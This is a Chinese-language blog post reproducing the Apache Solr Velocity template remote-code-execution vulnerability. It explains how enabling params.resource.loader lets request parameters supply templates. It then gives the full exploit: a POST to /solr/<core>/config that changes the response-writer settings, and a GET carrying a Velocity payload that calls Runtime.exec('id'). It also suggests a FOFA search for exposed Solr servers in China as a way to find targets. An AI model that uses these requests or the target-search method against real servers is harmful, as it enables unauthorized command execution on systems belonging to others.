Apache Solr Velocity模塊漏洞復現

10月31日發現的apache solr的最新漏洞，經過測試該poc真實有效，且危害性高。

poc地址：https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

漏洞原理：攻擊者可以直接訪問solr控制檯時，可通過發送/節點名/config的post請求對該節點的配置文件進行修改，將Apache solr的params.resource.loader.enabled爲true，這個選項是用來控制是否允許參數資源加載器在Solr請求參數中指定模板，當設置爲true時，將允許用戶通過設置請求中的參數來指定相關資源的加載，所以可以通過該漏洞，在服務器上進行命令執行。

漏洞復現：

在fofa上搜索 app="Solr" && country="CN"

裏面會有大量Solr服務器。

第一步：獲得path路徑：紅框標的就是core的名稱

直接構成post請求，在 /solr/core名稱/config下修改solr.resource.loader.enabled 和 params.resource.loader.enabled 爲true

poc爲：

-------------------------------------------------------------------------------------------------------------------------------------------------

POST /solr/core名稱/config HTTP/1.1

Host:ip:port

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: application/json, text/plain, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Content-Length: 259


{

  "update-queryresponsewriter": {

    "startup": "lazy",

    "name": "velocity",

    "class": "solr.VelocityResponseWriter",

    "template.base.dir": "",

    "solr.resource.loader.enabled": "true",

    "params.resource.loader.enabled": "true"

  }

}

-------------------------------------------------------------------------------------------------------------------------------------------------

用exp進行漏洞復現：
 

GET /solr/core名稱/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: ip:port
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

--------

特別鳴謝：山石瞭望